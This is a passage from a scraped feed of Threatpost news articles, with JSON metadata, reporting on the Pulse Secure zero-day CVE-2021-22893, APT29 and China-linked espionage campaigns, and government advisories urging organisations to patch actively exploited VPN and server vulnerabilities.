CVE-2021-22893, allows remote code-execution (RCE) and is being used in the wild to gain administrator-level access to the appliances, according to Ivanti research. Pulse Secure said that the zero-day will be patched in early May; but in the meantime, the company worked with Ivanti (its parent company) to release both mitigations and the [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/KB44755/s>), to help determine if systems have been impacted.\n\n\u201cThe investigation shows ongoing attempts to exploit four issues: The substantial bulk of these issues involve three vulnerabilities that were patched in 2019 and 2020: [Security Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) (CVE-2019-11510), [Security Advisory SA44588](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44588>) (CVE-2020-8243) and [Security Advisory SA44601](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601>) (CVE-2020-8260),\u201d according to a Pulse Secure statement provided to Threatpost. \u201cThe new issue, discovered this month, impacted a very limited number of customers.\u201d\n\n## **CVE-2021-22893: A Zero-Day in Pulse Connect Secure VPNs**\n\nThe newly discovered critical security hole is rated 10 out of 10 on the CVSS vulnerability-rating scale. It\u2019s an authentication bypass vulnerability that can allow an unauthenticated user to perform RCE on the Pulse Connect Secure gateway. It \u201cposes a significant risk to your deployment,\u201d according to the advisory, [issued Tuesday](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>).\n\n\u201cThe ongoing COVID-19 crisis resulted in an overnight shift to remote work culture, and VPNs played a critical role to make this possible,\u201d Bharat Jogi, senior manager of vulnerability and threat research at Qualys, said via email. \u201cVPNs have become a prime target for cybercriminals and over the past few months.\u201d\n\n\u201cThe Pulse Connect Secure vulnerability with CVE-2021-22893\u2026can be exploited without any user interaction,\u201d he added.\n\nThe mitigations involve importing a file called \u201cWorkaround-2104.xml,\u201d available on the advisory page. It disables the Windows File Share Browser and Pulse Secure Collaboration features on the appliance.\n\nUser can also use the blacklisting feature to disable URL-based attacks, the firm noted, by blocking the following URIs:\n\n * ^/+dana/+meeting\n * ^/+dana/+fb/+smb\n * ^/+dana-cached/+fb/+smb\n * ^/+dana-ws/+namedusers\n * ^/+dana-ws/+metric\n\n\u201cThe Pulse Connect Secure (PCS) team is in contact with a limited number of customers who have experienced evidence of exploit behavior on their PCS appliances,\u201d according to Pulse Secure. \u201cThe PCS team has provided remediation guidance to these customers directly.\u201d\n\nAccording to tandem research from Mandiant, this and the other bugs are at the center of a flurry of activity by different threat actors, involving 12 different malware families overall. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement. Two specific advanced persistent threat (APT) groups, UNC2630 and UNC2717, are particularly involved, researchers said.\n\n## **UNC2630 Cyber-Activity: Links to China**\n\n\u201cWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments,\u201d according to Mandiant, in a [Tuesday posting](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>). \u201cIn order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance.\u201d\n\nThe firm tracks those tools as the following:\n\n * **SlowPulse:** Trojanized shared objects with malicious code to log credentials and bypass authentication flows within the legitimate Pulse Secure shared object libdsplibs.so, including multifactor authentication requirements.\n * **RadialPulse and PulseCheck:** Web shells injected into legitimate, internet-accessible Pulse Secure VPN appliance administrative web pages.\n * **ThinBlood:** A utility used to clear relevant log files.\n * **Other capabilities:** Toggling the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem; the ability to maintain persistence across VPN appliance general upgrades that are performed by the administrator; and the ability to unpatch modified files and delete utilities and scripts after use to evade detection.\n\nUNC2630 targeted U.S. defense-sector companies as early as last August, Mandiant noted. It added that the activity could be state-sponsored, likely backed by China.\n\n\u201cWe suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5,\u201d according to the analysis. \u201cUNC2630\u2019s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed them during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5.\u201d\n\nAPT5 consistently targets defense and technology companies in the Asia, Europe and the U.S., Mandiant noted.\n\n\u201c[It] has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances,\u201d Mandiant researchers said. \u201cAPT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.\u201d\n\n## **The UNC2717 APT Connection**\n\nAs for UNC2717, Mandiant linked Pulse Secure zero-day activity back to the APT in a separate incident in March, targeted against an unnamed European organization. UNC2717 was also seen targeting global government agencies between October and March.\n\nSo far, there\u2019s not enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group, Mandiant said.\n\nThe tools used by this group include HardPulse, which is a web shell; PulseJump, used for credential-harvesting; and RadialPulse. The firm also observed a new malware that it calls LockPick, which is a trojanized OpenSSL library file that appears to weaken encryption for communications used by the VPN appliances.\n\nAll of the malware families in use in the campaigns appear to be loosely related, according to Mandiant.\n\n\u201cAlthough we did not observe PulseJump or HardPulse used by UNC2630 against U.S. [defense] companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630,\u201d researchers said.\n\nThey added, \u201cMandiant cannot associate all the code families described in this report to UNC2630 or UNC2717. We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected APT actors.\u201d\n\n## **Pulse Secure: A Favorite Target for APTs**\n\nPulse Secure VPNs continue to be a hot target for nation-state actors. Last week, [the FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n\nMeanwhile, earlier in April, the Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n\nAnd last fall, the Cybersecurity and Infrastructure Security Agency (CISA) said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\n\u201cAlmost without fail, the common thread with any APT is the exploitation of known vulnerabilities both new and old,\u201d Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, said via email. \u201cMalicious activity, whether using a supply-chain vector or a VPN authentication bypass, is thwarted by good cyber-hygiene practices and serious blue teaming. Vulnerability management, or more importantly vulnerability remediation, is a cybersecurity dirty job that is under-resourced and underappreciated and businesses are paying the price.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "modified": "2021-04-21T15:35:37", "published": "2021-04-21T15:35:37", "id": "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "href": "https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/", "type": "threatpost", "title": "Pulse Secure Critical Zero-Day Security Bug Under Active Exploit", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-16T19:56:37", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. \u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malwares uses hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. \u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence & Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "modified": "2020-07-16T18:05:20", "published": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:19:31", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; they have also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vector for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "modified": "2020-09-14T21:20:46", "published": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T18:13:10", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. and allied national-security and government networks, it added.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. \u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like that adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacore Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. Attacker can send a specially crafted URI to trigger the exploit. It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN family.\n\nAt the time, DHS [warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who have already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen September, a successful cyberattack on an unnamed federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. \u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway that can allow remote code-execution. It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **C****VE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMWare Workspace One Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on underlying operating systems. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware One Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware Vrealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. \u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register 